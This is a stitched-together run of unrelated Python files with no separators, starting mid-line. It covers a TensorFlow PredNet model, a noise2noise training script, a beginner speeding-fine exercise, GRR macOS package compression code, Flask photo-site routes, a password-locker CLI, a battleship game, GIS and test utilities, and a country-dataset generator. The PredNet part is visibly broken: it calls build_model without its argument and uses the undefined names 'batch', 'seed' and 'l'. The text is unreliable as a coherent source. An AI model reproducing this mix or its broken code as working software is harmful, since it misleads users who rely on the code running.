= None img_w, img_h, img_c = self.img_shape self.frame_shape = [self.batch_size, 1, img_h, img_w, img_c] self.error_shape = [self.batch_size, 1, self.nb_layers] self.input_shape = [self.batch_size, self.time_step, img_h, img_w, img_c] self.build_model() def build_model(self, hps): self.inputs = tf.placeholder(tf.float32, self.input_shape) frame_predictions, errors = self.forward(self.inputs) errors = tf.concat(axis=1, values=errors) # [b, t, nb_layers] self.frame_predictions = tf.concat(axis=1, values=frame_predictions) # [b, t, h, w, c] layer_loss_weights = np.expand_dims(self.layer_loss_weights, 1) time_loss_weights = 1. 
/ (self.time_step - 1) * np.ones((self.time_step, 1)) time_loss_weights[0] = 0 time_loss_weights = np.array(time_loss_weights, np.float32) errors_ = tf.reshape(errors, [-1, self.nb_layers]) errors_by_time = tf.matmul(errors_, layer_loss_weights) # [b * t, 1] errors_by_time = tf.reshape(errors_by_time, (self.batch_size, self.time_step)) errors_by_time = errors[:, :, 0] final_error = flatten(tf.matmul(errors_by_time, time_loss_weights)) # [b] final_error = tf.reduce_mean(final_error) # training operation self.error = final_error self.loss_sum = tf.summary.scalar("error", self.error) self.t_vars = tf.trainable_variables() num_param = 0.0 for var in self.t_vars: num_param += int(np.prod(var.get_shape())) print("Number of paramers: %d"%num_param) self.saver = tf.train.Saver(max_to_keep = 10) def forward(self, inputs): """ inputs : [batch_size, t, h, w, c] batch_size : batch datasize t : time step (frame) h : image height size w : image width size c : image channel size """ states = self.get_initial_state() errors = [] frame_predictions = [] t = inputs.get_shape().as_list()[1] reuse_step = False for ti in range(t): a = inputs[:, ti] output, states = self.step(a, states, reuse_step=reuse_step) frame_predictions.append(tf.reshape(output[0], self.frame_shape)) errors.append(tf.reshape(output[1], self.error_shape)) reuse_step = True return frame_predictions, errors def get_initial_state(self): initial_states = [] img_h, img_w, img_c = self.img_shape for u in ["r", "c", "e"]: for l in range(self.nb_layers): if u in ['r', 'c']: stack_size = self.R_stack_sizes[l] elif u == 'e': stack_size = 2 * self.stack_sizes[l] output_size = stack_size * img_h * img_w initial_state = tf.zeros((batch, output_size)) output_shape = (self.batch_size, img_h, img_w, stack_size) initial_state = tf.reshape(initial_state, output_shape) initial_states += [initial_state] return initial_states def step(self, a, states, reuse_step, scope_step='one_step'): r_tm1 = states[: self.nb_layers] c_tm1 = states[self.nb_layers: 2 * self.nb_layers] e_tm1 = states[2 * self.nb_layers: 3 * self.nb_layers] r = [] c = [] e = [] with tf.variable_scope(scope_step) as scope: if reuse_step: scope.reuse_variables() for l in reversed(range(self.nb_layers)): inputs = [r_tm1[l], e_tm1[l]] if l < self.nb_layers - 1: inputs.append(r_up) inputs = tf.concat(inputs, axis=-1) new_c, new_r = self.convlstm(inputs, l, c_tm1[l], 'lstm' + str(l)) c.insert(0, new_c) r.insert(0, new_r) if l > 0: r_up = add_upscale(new_r) for l in range(self.nb_layers): # Ahat with tf.variable_scope("conv_ahat"+str(l)): input_ = r[l] k_h = 3 k_w = 3 in_ch = input_.get_shape()[-1] out_ch = self.stack_sizes[l] w = tf.get_variable("weights", [k_h, k_w, in_ch, out_ch], initializer=tf.contrib.layers.xavier_initializer(seed=seed)) b = tf.get_variable('biases', [out_ch], initializer=tf.constant_initializer(0.0)) conv = tf.nn.conv2d(input_, w, strides=[1, 1, 1, 1], padding='SAME') conv = tf.nn.bias_add(conv, b) ahat = tf.nn.relu(conv) if l == 0: ahat = tf.minimum(ahat, self.pixel_max) frame_prediction = ahat e_up = tf.nn.relu(ahat - a) e_down = tf.nn.relu(a - ahat) e.append(tf.concat([e_up, e_down], axis=-1)) if self.output_layer_num == l: if self.output_layer_type == 'A': output = a elif self.output_layer_type == 'Ahat': output = ahat elif self.output_layer_type == 'r': output = r[l] elif self.output_layer_type == 'e': output = e[l] if l < self.nb_layers - 1: # A with tf.variable_scope("conv_a"+str(l)): input_ = e[l] k_h = 3 k_w = 3 in_ch = input_.get_shape()[-1] out_ch = 
self.stack_sizes[l+1] w = tf.get_variable("weights", [k_h, k_w, in_ch, out_ch], initializer=tf.contrib.layers.xavier_initializer(seed=seed)) b = tf.get_variable("biases", [out_ch], initializer=tf.constant_initializer(0.0)) conv = tf.nn.conv2d(input_, w, strides=[1, 1, 1, 1], padding='SAME') conv = tf.nn.bias_add(conv, b) a = tf.nn.relu(conv) a = tf.nn.max_pool(a, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') if self.output_layer_type is None: if self.output_mode == 'prediction': output = frame_prediction else: for l in range(self.nb_layers): layer_error = tf.reduce_mean(flatten(e[l]), axis=-1, keep_dims=True) if l == 0: all_error = layer_error else: all_error = tf.concat([all_error, layer_error], axis=-1) if self.output_mode == 'error': output = all_error else: output = [frame_prediction, all_error] states = r + c + e return output, states def convlstm(self, inputs, li, c, scope_name="conv_lstm", reuse=False): with tf.variable_scope(scope_name) as scope: if reuse: scope.reuse_variables() concat = conv2d(inputs, self.R_stack_sizes[li] * 4, self.R_filter_sizes[li], self.R_filter_sizes[li], name='lstm'+str(l)) i, z, f, o = tf.split(axis=3, num_or_size_splits=4, value=concat) new_c = c * tf.nn.sigmoid(f) + tf.nn.sigmoid(i) * tf.nn.tanh(z) new_h = tf.nn.tanh(new_c) * tf.nn.sigmoid(o) return new_c, new_h def save(self, sess, checkpoint_dir, step): model_name = "PredNet" if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) self.saver.save(sess, os.path.join(checkpoint_dir, model_name), global_step=step) def load(self, sess, checkpoint_dir, model_name=None): print(" [*] Reading checkpoints...") ckpt = tf.train.get_checkpoint_state(checkpoint_dir) if ckpt and ckpt.model_checkpoint_path: ckpt_name = os.path.basename(ckpt.model_checkpoint_path) if model_name is None: model_name = ckpt_name self.saver.restore(sess, os.path.join(checkpoint_dir, model_name)) print(" Loaded model: "+str(model_name)) return True, model_name else: return False, None #/usr/bin/python3 #-*- encoding=utf-8 -*- import argparse import numpy as np from pathlib import Path from keras.callbacks import LearningRateScheduler, ModelCheckpoint from keras.optimizers import Adam from model import get_model, PSNR, L0Loss, UpdateAnnealingParameter from generator import NoisyImageGenerator, ValGenerator class Schedule: def __init__(self, nb_epochs, initial_lr): self.epochs = nb_epochs self.initial_lr = initial_lr def __call__(self, epoch_idx): if epoch_idx < self.epochs * 0.25: return self.initial_lr elif epoch_idx < self.epochs * 0.50: return self.initial_lr * 0.5 elif epoch_idx < self.epochs * 0.75: return self.initial_lr * 0.25 return self.initial_lr * 0.125 def get_args(): parser = argparse.ArgumentParser(description="train noise2noise model", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("--image_dir_1", type=str, default='/data_1/noise2noise-master/chejian_img/291_in.txt', help="train image dir") parser.add_argument("--image_dir_2", type=str, default='/data_1/noise2noise-master/chejian_img/291_out.txt', help="train image dir") parser.add_argument("--test_dir_1", type=str,default='/data_1/noise2noise-master/chejian_img/291_in.txt', help="test image dir") parser.add_argument("--test_dir_2", type=str,default='/data_1/noise2noise-master/chejian_img/291_out.txt', help="test image dir") parser.add_argument("--image_size", type=int, default=128, help="training patch size") parser.add_argument("--batch_size", type=int, default=8, help="batch size") parser.add_argument("--nb_epochs", 
type=int, default=60, help="number of epochs") parser.add_argument("--lr", type=float, default=0.001, help="learning rate") parser.add_argument("--steps", type=int, default=1000, help="steps per epoch") parser.add_argument("--loss", type=str, default="mae", help="loss; mse', 'mae', or 'l0' is expected") parser.add_argument("--weight", type=str, default='/data_1/noise2noise-master/weights.056-4.172-28.07752_text_clean.hdf5', help="weight file for restart") parser.add_argument("--output_path", type=str, default="model_0415_new", help="checkpoint dir") parser.add_argument("--model", type=str, default="srresnet", help="model architecture ('srresnet' or 'unet')") args = parser.parse_args() return args def main(): args = get_args() source_image_dir = args.image_dir_1 target_image_dir = args.image_dir_2 test_source_dir = args.test_dir_1 test_target_dir = args.test_dir_2 image_size = args.image_size batch_size = args.batch_size nb_epochs = args.nb_epochs lr = args.lr steps = args.steps loss_type = args.loss output_path = Path(__file__).resolve().parent.joinpath(args.output_path) model = get_model(args.model) if args.weight is not None: print("load pre-trained weight: " + args.weight) model.load_weights(args.weight) opt = Adam(lr=lr) callbacks = [] if loss_type == "l0": l0 = L0Loss() callbacks.append(UpdateAnnealingParameter(l0.gamma, nb_epochs, verbose=1)) loss_type = l0() model.compile(optimizer=opt, loss=loss_type, metrics=[PSNR]) #source_noise_model = get_noise_model(args.source_noise_model) #target_noise_model = get_noise_model(args.target_noise_model) #val_noise_model = get_noise_model(args.val_noise_model) print("NoisyImageGenerator start") generator = NoisyImageGenerator(source_image_dir, target_image_dir, batch_size, image_size) print("NoisyImageGenerator end") print("ValGenerator start") val_generator = ValGenerator(test_source_dir, test_target_dir, image_size) print("ValGenerator end") output_path.mkdir(parents=True, exist_ok=True) callbacks.append(LearningRateScheduler(schedule=Schedule(nb_epochs, lr))) callbacks.append(ModelCheckpoint(str(output_path) + "/weights.{epoch:03d}-{val_loss:.3f}-{val_PSNR:.3f}.hdf5", monitor="val_loss", verbose=1, mode="min", save_best_only=False)) print("fit_generator start") hist = model.fit_generator(generator=generator, steps_per_epoch=steps, epochs=nb_epochs, validation_data=val_generator, verbose=1, callbacks=callbacks) print("fit_generator end") np.savez(str(output_path.joinpath("history.npz")), history=hist.history) if __name__ == '__main__': main() """ DESAFIO 029: letrônico Escreva um programa que leia a velocidade de um carro. Se ele ultrapassar 80 km/h, mostre uma mensagem dizendo que ele foi multado. A multa vai custar R$ 7,00 por cada km acima do limite. """ vel = int(input('Qual velocidade o carro está? Digite um número inteiro (ex: 85): ')) multa = 7.00 total = (vel - 80) * multa if vel > 80: print('O carro está a {} Km/h, sendo que a velocidade máxima permitida é 80 Km/h.'.format(vel)) print('Nesse caso, a multa para ele é R$ {:.2f}!'.format(total)) else: print('O carro está a {} Km/h, portanto está dentro da velocidade máxima permitida de 80 Km/h!'.format(vel)) papermerge/test/parts/app_max_p/apps.py from django.apps import AppConfig class AppMaxPConfig(AppConfig): name = 'app_max_p' 1000+ #!/usr/bin/env python """Efficient compression of pkg installers. Use case: store multiple large .pkg with similar and overlapping content in one zip archive. Solution: a .pkg file is a XAR archive. 
A XAR archive contains: * a binary header * a gzip-compressed XML table of contents * the concatenated archived files The most notable file is named Payload, which is a gzip'ed CPIO archive containing all the files to be installed. CPIO archives files as a sequence of (ASCII header, file name, file contents). References: * https://en.wikipedia.org/wiki/Xar_(archiver) * https://www.mkssoftware.com/docs/man4/cpio.4.asp """ import contextlib import gzip import hashlib import os import platform import shutil import struct import subprocess import typing import xml.dom.minidom import zlib from grr_response_core.lib import utils HASH_FILE_BLOCK_SIZE = 4 * 1024 def _ExtractPayload(payload_path: str, blocks_file_path: str, blocks_dir: str) -> None: """Extracts and splits up the Payload file. Args: payload_path: Path to original payload. blocks_file_path: Path to output block index file. blocks_dir: Path to directory to write blocks into. """ with contextlib.ExitStack() as stack: payload = stack.enter_context(gzip.open(payload_path, "rb")) blocks_file = stack.enter_context(open(blocks_file_path, "w")) def WriteBlock(data): checksum = hashlib.sha1(data).digest().hex() with open(os.path.join(blocks_dir, checksum), "wb") as out: out.write(data) print(checksum, file=blocks_file) while True: header = payload.read(76) WriteBlock(header) (magic, name_length_str, data_length_str) = struct.unpack("6s53x6s11s", header) if magic != b"070707": raise ValueError(f"Invalid CPIO header magic: {magic}.") name_length = int(name_length_str, 8) data_length = int(data_length_str, 8) data = payload.read(name_length + data_length) WriteBlock(data) if data.startswith(b"TRAILER!!"): break def _ExtractXarHeader(xar_path: str, dst_path: str) -> None: """Extracts the XAR binary header from a XAR file.""" with contextlib.ExitStack() as stack: xar = stack.enter_context(open(xar_path, "rb")) header_prefix = xar.read(6) (magic, header_length) = struct.unpack(">4sH", header_prefix) if magic != b"xar!": raise ValueError("Invalid XAR header magic: {magic}.") xar.seek(0) header = xar.read(header_length) out = stack.enter_context(open(dst_path, "wb")) out.write(header) def _FlattenFiles(src_dir: str, dst_dir: str) -> None: for root, _, files in os.walk(src_dir): for file in files: shutil.move(os.path.join(root, file), os.path.join(dst_dir, file)) shutil.rmtree(src_dir) def SplitPkg(pkg_path: str, dst_dir: str, blocks_dir: str) -> None: """Decomposes a pkg file into a pair of directories. Args: pkg_path: Path to input .pkg file. dst_dir: Destination directory. blocks_dir: Directory to write blocks into. Raises: RuntimeError: if called on a system different than OSX. A pkg file is decomposed and stored into 2 directories (`dst_dir`, `blocks_dir`): * `dst_dir/header`: XAR binary header * `dst_dir/toc`: XAR XML table of contents * `dst_dir/files/`: all the files contained in the XAR EXCEPT payload, directories flattened. * `dst_dir/payload`: a list of files in the `blocks_dir/` directory, which if concatenated, produce the `Payload` file * `blocks_dir/`: contains fragments of the gunzip'ed `Payload` file The `Payload` file is decompressed, decomposed into blocks and stored as `blocks_dir/`. For each file in the CPIO archive 2 blocks are created, one for the ASCI header and another for the (file name, file contents) part. The `blocks_dir/` directory can be shared by multiple packages, resulting in common files being stored once only. SplitPkg is implemented using OSX command line tools and will thus run on OSX only. 
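# Reader aid, not part of the original module: a minimal standalone sketch of
# the 76-byte portable-ASCII ("odc", magic 070707) CPIO header that
# _ExtractPayload splits the Payload on. Field widths follow cpio(4); the
# helper and NamedTuple names are illustrative only.
import struct
import typing


class CpioOdcHeader(typing.NamedTuple):
  magic: bytes
  name_length: int  # octal c_namesize (includes the file name's trailing NUL)
  data_length: int  # octal c_filesize


def ParseCpioOdcHeader(header: bytes) -> CpioOdcHeader:
  """Parses magic, name size and file size out of one 76-byte odc header."""
  if len(header) != 76:
    raise ValueError(f"Expected a 76-byte header, got {len(header)} bytes.")
  # 6s = c_magic, 53x skips dev/ino/mode/uid/gid/nlink/rdev/mtime,
  # 6s = c_namesize, 11s = c_filesize -- all stored as octal ASCII digits.
  magic, name_size, file_size = struct.unpack("6s53x6s11s", header)
  if magic != b"070707":
    raise ValueError(f"Invalid CPIO header magic: {magic}.")
  return CpioOdcHeader(magic, int(name_size, 8), int(file_size, 8))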
""" if platform.system() != "Darwin": raise RuntimeError("JoinPkg works only on Mac OSX.") utils.EnsureDirExists(dst_dir) utils.EnsureDirExists(blocks_dir) files_root = os.path.join(dst_dir, "files") utils.EnsureDirExists(files_root) tmp_files_root = os.path.join(dst_dir, "_files") utils.EnsureDirExists(tmp_files_root) _ExtractXarHeader(pkg_path, os.path.join(dst_dir, "header")) command = ["xar", "--dump-toc=toc", "-f", pkg_path] subprocess.check_call(command, cwd=dst_dir) command = ["xar", "-x", "-f", pkg_path] subprocess.check_call(command, cwd=tmp_files_root) _FlattenFiles(tmp_files_root, files_root) _ExtractPayload( os.path.join(files_root, "Payload"), os.path.join(dst_dir, "payload"), blocks_dir) os.unlink(os.path.join(files_root, "Payload")) with open(os.path.join(dst_dir, "name"), "w") as f: f.write(os.path.basename(pkg_path)) def _BuildPayload(src_payload_path: str, dst_payload_path: str, blocks_dir: str) -> None: with contextlib.ExitStack() as stack: dst_payload = stack.enter_context(gzip.open(dst_payload_path, "wb")) block_index = stack.enter_context(open(src_payload_path, "r")) for block_hash in block_index: block_hash = block_hash.strip("\n") with open(os.path.join(blocks_dir, block_hash), "rb") as block: shutil.copyfileobj(block, dst_payload) def _XmlChild(node: xml.dom.minidom.Element, name: str) -> xml.dom.minidom.Element: children = node.getElementsByTagName(name) child = children[0] return child def _XmlChildValue(node: xml.dom.minidom.Element, name: str) -> str: text_nodes = _XmlChild(node, name).childNodes return text_nodes[0].data def _SetXmlChildValue(node: xml.dom.minidom.Element, name: str, value: typing.Any) -> None: text_nodes = _XmlChild(node, name).childNodes text_nodes[0].data = str(value) def _SetXmlChildAttribute(node: xml.dom.minidom.Element, name: str, attribute: str, value: typing.Any) -> None: _XmlChild(node, name).setAttribute(attribute, str(value)) def _HashFile(path: str) -> bytes: hasher = hashlib.sha1() with open(path, "rb") as f: while True: block = f.read(HASH_FILE_BLOCK_SIZE) if not block: break hasher.update(block) return hasher.digest() class _BuildTocResult(typing.NamedTuple): toc: bytes file_order: typing.List[str] def _BuildToc(src_toc_path: str, files_dir: str) -> _BuildTocResult: """Creates a new XAR table of contents. Args: src_toc_path: Path to source TOC file. files_dir: Path to directory containing files of this XAR archive. Returns: The new TOC and a sorted list of file names, to be written into the XAR in that specific order. 
""" file_order = [] dom = xml.dom.minidom.parse(src_toc_path) _SetXmlChildAttribute(dom, "checksum", "style", "sha1") checksum_elem = _XmlChild(dom, "checksum") _SetXmlChildValue(checksum_elem, "offset", 0) _SetXmlChildValue(checksum_elem, "size", hashlib.sha1().digest_size) current_offset = hashlib.sha1().digest_size file_elems = dom.getElementsByTagName("file") for file_elem in file_elems: name = _XmlChildValue(file_elem, "name") file_type = _XmlChildValue(file_elem, "type") if file_type != "file": continue file_path = os.path.join(files_dir, name) size = os.path.getsize(file_path) file_order.append(name) _SetXmlChildValue(file_elem, "offset", current_offset) _SetXmlChildValue(file_elem, "size", size) _SetXmlChildValue(file_elem, "length", size) checksum = _HashFile(file_path).hex() _SetXmlChildValue(file_elem, "archived-checksum", checksum) _SetXmlChildAttribute(file_elem, "archived-checksum", "style", "sha1") _SetXmlChildValue(file_elem, "extracted-checksum", checksum) _SetXmlChildAttribute(file_elem, "extracted-checksum", "style", "sha1") _SetXmlChildAttribute(file_elem, "encoding", "style", "application/octet-stream") current_offset += size return _BuildTocResult(toc=dom.toxml("utf-8"), file_order=file_order) def _BuildHeader(src_header_path: str, toc_size: int, toc_compressed_size: int) -> bytes: with open(src_header_path, "rb") as src_header: header = src_header.read() header = header[:8] + struct.pack(">QQL", toc_compressed_size, toc_size, 1) + header[28:] return header def JoinPkg(src_dir: str, blocks_dir: str, dst_path: str) -> None: # pyformat: disable """Recreates a .pkg file from a pair of directories. Args: src_dir: Directory containing decomposed .pkg file. blocks_dir: Directory containing blocks. dst_path: Path to destination .pkg file. Mode of operation: * Builds and gzip's the `Payload` file. * Creates a new XAR table of contents: * Patches the new size and checksum of the `Payload` file. * Since the size of the `Payload` file likely changed, recalculates the offset of all the other files. * Since most of the files other than `Payload` are small, for simplicity, we don't compress them. Their encoding and checksum has to be adjusted. * Concatenates the XAR header, the XAR table of contents, the checksum of the table of contents and the files. JoinPkg is portable code. 
""" # pyformat: enable def SrcDir(*components): return os.path.join(src_dir, *components) _BuildPayload(SrcDir("payload"), SrcDir("files", "Payload"), blocks_dir) toc, files_order = _BuildToc(SrcDir("toc"), SrcDir("files")) toc_compressed = zlib.compress(toc) header = _BuildHeader(SrcDir("header"), len(toc), len(toc_compressed)) with open(dst_path, "wb") as dst: dst.write(header) dst.write(toc_compressed) dst.write(hashlib.sha1(toc_compressed).digest()) for file_name in files_order: with open(SrcDir("files", file_name), "rb") as file: shutil.copyfileobj(file, dst) from flask import render_template, Blueprint, jsonify, current_app from flask_login import current_user from noirart.notifications import push_follow_notification, push_collect_notification from noirart.models import User, Notification, Photo ajax_bp = Blueprint('ajax', __name__) @ajax_bp.route('/profile/') def get_profile(user_id): user = User.query.get_or_404(user_id) return render_template('main/profile_popup.html', user=user) @ajax_bp.route('/notifications-count') def notifications_count(): if not current_user.is_authenticated: return jsonify(message='Login required.'), 403 count = Notification.query.with_parent(current_user).filter_by(is_read=False).count() return jsonify(count=count) @ajax_bp.route('//followers-count') def collectors_count(photo_id): photo = Photo.query.get_or_404(photo_id) count = len(photo.collectors) return jsonify(count=count) @ajax_bp.route('/collect/', methods=['POST']) def collect(photo_id): current_app.logger.debug('ajax.py:collect()--->') if not current_user.is_authenticated: return jsonify(message='Login required.'), 403 # if not current_user.confirmed: # return jsonify(message='Confirm account required.'), 400 if not current_user.can('COLLECT'): return jsonify(message='No permission.'), 403 photo = Photo.query.get_or_404(photo_id) if current_user.is_collecting(photo): return jsonify(message='Already collected.'), 400 current_user.collect(photo) if current_user != photo.author and photo.author.receive_collect_notification: push_collect_notification(collector=current_user, photo_id=photo_id, receiver=photo.author) return jsonify(message='Photo collected.') @ajax_bp.route('/uncollect/', methods=['POST']) def uncollect(photo_id): current_app.logger.debug('ajax.py uncollect()') if not current_user.is_authenticated: return jsonify(message='Login required.'), 403 photo = Photo.query.get_or_404(photo_id) if not current_user.is_collecting(photo): return jsonify(message='Not collect yet.'), 400 current_user.uncollect(photo) return jsonify(message='Collect canceled.') from user import User def main(): while True: print("Welcome to password locker!") print('\n') print("Select a code to navigate through: to create new user use 'new: to login to your account 'log or 'ex' to exit") code = input().lower() print('\n') if code == 'new': print('Create Username') created_username = input() print('Create Password') created_user_password = input() print('confirm password') confirm_password = input() while confirm_password != created_user_password: print('Passwords do not match!') print('Enter valid password to match the previous!') created_user_password = input() print('Confirm your password') confirm_password = input() else: print(f'Hurray {created_username}!!, Your account was created successfully!') print('\n') print("Continue to Login") print("Username") entered_username = input() print("Your Password") entered_password = input() while entered_username != created_username or entered_password != 
created_user_password: print("Invalid username or password!") print("Username") entered_username = input() print("Enter your password") entered_password = input() else: print(f" Welcome {entered_username} to your account!") print('\n') elif code == 'log': print("Welcome!") print("Enter Username") default_username = input() print("Enter your password") default_user_password = input() print('\n') while default_username != 'testuser' or default_user_password != '': print("Wrong Username or Password. Username 'testuser' Password '") print("Username") default_username = input() print("Enter Your Password") default_user_password = input() print('\n') else: print("Logged in successfully!") print('\n') print('\n') elif code == 'ex': breakpoint else: print("Enter valid code to proceed!") if __name__ == '__main__': main() """ Battlesip Game Based on: https://github.com/M0r13n/battleships """ import logging import time import bs_game from battleship.console import console from play_sounds import play_while_running from rich.prompt import IntPrompt, Prompt logging.basicConfig(filename="log.log", level=logging.DEBUG) SFX_INGAME_PATH = "bin/utils/sound/sfx_battleship_soundtrack.wav" def main(): """Game""" # Network setup host = "localhost" port = 5000 last_shot_hit = False last_move = None player_won = False is_server = Prompt.ask("Are you a client or a server? (c/s)").lower()[0] == "s" player_turn = not is_server if not is_server: host = Prompt.ask( "Enter hostname (default: localhost)", default="localhost", show_default=False, ) port = IntPrompt.ask( "Enter port (default: 5000)", default=5000, show_default=False ) with bs_game.Network(host, port, is_server) as net, play_while_running(SFX_INGAME_PATH): # Initialise player_board = bs_game.create_empty_board() enemy_board = bs_game.create_empty_board() bs_game.place_ships(player_board, enemy_board) console.print("Okay, let's start:") bs_game.print_boards(player_board, enemy_board) # Game on while not bs_game.player_lost(player_board): if player_turn: x, y = bs_game.ask_player_for_shot() last_move = bs_game.Shot(x, y, last_shot_hit) net.send(bytes(last_move)) else: console.print("Waiting for enemy's response...") data = net.recv() if not data: player_won = True break enemy_shot = bs_game.Shot.decode(data) # True if enemy hit player last_shot_hit = bs_game.update_player_board(enemy_shot, player_board) if last_move: last_move.last_shot_hit = enemy_shot.last_shot_hit bs_game.update_enemy_board(last_move, enemy_board) bs_game.print_boards(player_board, enemy_board) player_turn = not player_turn if player_won: console.print("You won!") time.sleep(3) else: console.print("You lost!") time.sleep(3) if __name__ == "__main__": main() # -*- coding: utf-8 -*- ''' This translation file adds a __LAYER field to a datasource before translating it Copyright (c) 2012 <> Released under the MIT license: http://opensource.org/licenses/mit-license.php ''' from osgeo import ogr import ogr2osm class LayerTranslation(ogr2osm.TranslationBase): def filter_layer(self, layer): if not layer: return layername = layer.GetName() # Add a __LAYER field field = ogr.FieldDefn('__LAYER', ogr.OFTString) field.SetWidth(len(layername)) layer.CreateField(field) # Set the __LAYER field to the name of the current layer for j in range(layer.GetFeatureCount()): ogrfeature = layer.GetNextFeature() ogrfeature.SetField('__LAYER', layername) layer.SetFeature(ogrfeature) # Reset the layer's read position so features are read later on layer.ResetReading() return layer # -*- coding: utf-8 -*- # Licensed 
under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import sys from collectd_pandas.tests.func.main import main ARGV = tuple(sys.argv) if len(ARGV) < 2: ARGV = ( 'unittest2', 'discover', '--locals', '--pattern', 'test_*.py', '--top-level-directory', '.', '--start-directory', './collectd_pandas/tests/func') sys.exit(main(argv=ARGV)) from . import ProgressiveTest import numpy as np from progressivis import Print from progressivis.stats import IdxMax, IdxMin, Max, Min, RandomTable from progressivis.table.stirrer import Stirrer from progressivis.core import aio class TestIdxMax(ProgressiveTest): def tearDown(self): TestIdxMax.cleanup() def test_idxmax(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) idxmax=IdxMax(scheduler=s) idxmax.input[0] = random.output.result max_=Max(scheduler=s) max_.input[0] = random.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmax.output.result aio.run(s.start()) max1 = max_.result #print('max1', max1) max2 = idxmax.max().last().to_dict() #print('max2', max2) self.compare(max1, max2) def test_idxmax2(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) stirrer = Stirrer(update_column='_1', delete_rows=5, fixed_step_size=100, scheduler=s) stirrer.input[0] = random.output.result idxmax=IdxMax(scheduler=s) idxmax.input[0] = stirrer.output.result max_=Max(scheduler=s) max_.input[0] = stirrer.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmax.output.result aio.run(s.start()) #import pdb;pdb.set_trace() max1 = max_.result #print('max1', max1) max2 = idxmax.max().last().to_dict() #print('max2', max2) self.compare(max1, max2) def test_idxmin(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) idxmin=IdxMin(scheduler=s) idxmin.input[0] = random.output.result min_=Min(scheduler=s) min_.input[0] = random.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmin.output.result aio.run(s.start()) min1 = min_.result #print('min1', min1) min2 = idxmin.min().last().to_dict() #print('min2', min2) self.compare(min1, min2) def test_idxmin2(self): s=self.scheduler() random = RandomTable(10, rows=10000,throttle=1000, scheduler=s) stirrer = Stirrer(update_column='_1', delete_rows=5, fixed_step_size=100, scheduler=s) stirrer.input[0] = random.output.result idxmin=IdxMin(scheduler=s) idxmin.input[0] = stirrer.output.result min_=Min(scheduler=s) min_.input[0] = stirrer.output.result pr=Print(proc=self.terse, scheduler=s) pr.input[0] = idxmin.output.result aio.run(s.start()) min1 = min_.result #print('min1', min1) min2 = idxmin.min().last().to_dict() #print('min2', min2) self.compare(min1, min2) def compare(self, res1, res2): v1 = np.array(list(res1.values())) v2 = np.array(list(res2.values())) #print('v1 = ', v1, res1.keys()) #print('v2 = ', v2, res2.keys()) self.assertTrue(np.allclose(v1, v2)) if __name__ == '__main__': ProgressiveTest.main() #!/usr/bin/env python3 # -*- coding: utf-8 -*- """Runs the generator with the configuration specified by 
the command line args.""" import collections import json import os import random import sys import typing import urllib.request import argmagic import streamtologger from aspwrapper import dlv_solver from countries import config from countries import country from countries import dataset_generator as data_gen __author__ = "" __copyright__ = ( "Copyright (c) 2018, \n" "All rights reserved.\n" "\n" "Redistribution and use in source and binary forms, with or without\n" "modification, are permitted provided that the following conditions are met:\n" "\n" "1. Redistributions of source code must retain the above copyright notice, this\n" " list of conditions and the following disclaimer.\n" "2. Redistributions in binary form must reproduce the above copyright notice,\n" " this list of conditions and the following disclaimer in the documentation\n" " and/or other materials provided with the distribution.\n" "\n" "THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n" "ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n" "WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n" "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n" "ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n" "(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n" "LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n" "ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n" "(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n" "SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ) __license__ = "BSD-2-Clause" __version__ = "2018.1" __date__ = "Mar 15, 2018" __maintainer__ = "" __email__ = "" __status__ = "Development" APP_DESCRIPTION = ( "This is a tool for generating datasets of reasoning tasks about countries and regions. " "For additional details, have a look at the project repository at " "https://github.com/phohenecker/country-data-gen." ) """str: The help text that is printed for this app if --help is provided.""" APP_NAME = "run-data-gen.sh" """str: The name that is displayed in the synopsis of this app.""" DATA_FILENAME = "countries.json" """str: The filename that is used for storing the data.""" DATA_URL = "https://raw.githubusercontent.com/mledoze/countries/master/countries.json" """str: The URL for downloading the data, which is specified in JSON format.""" LOG_FILE_NAME = "out.log" """str: The filename of the created log file.""" ONTOLOGY = "src/main/asp/ontology.asp" """str: The path to the ASP program that describes the used ontology.""" ISO_CODE_KEY = "cca3" """str: The key that is used to store the ISO 3166-1 alpha-3 code for countries, e.g., 'AUT', in the data file.""" NEIGHBORS_KEY = "borders" """str: The key that is used to store a country's neighbors in the data file.""" REGION_KEY = "region" """str: The key that is used to store a country's region in the data file.""" SUBREGION_KEY = "subregion" """str: The key that is used to store a country's subregion in the data file.""" def _load_data(path: str) -> typing.Dict[str, country.Country]: """Loads the raw data from the provided path. The path is supposed to point to a JSON file that specifies countries and regions in the format that is used in the original `GitHub repository `_. Args: path (str): The path to the JSON file that contains the data. 
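# Reader aid: an illustrative record restricted to the keys _load_data reads
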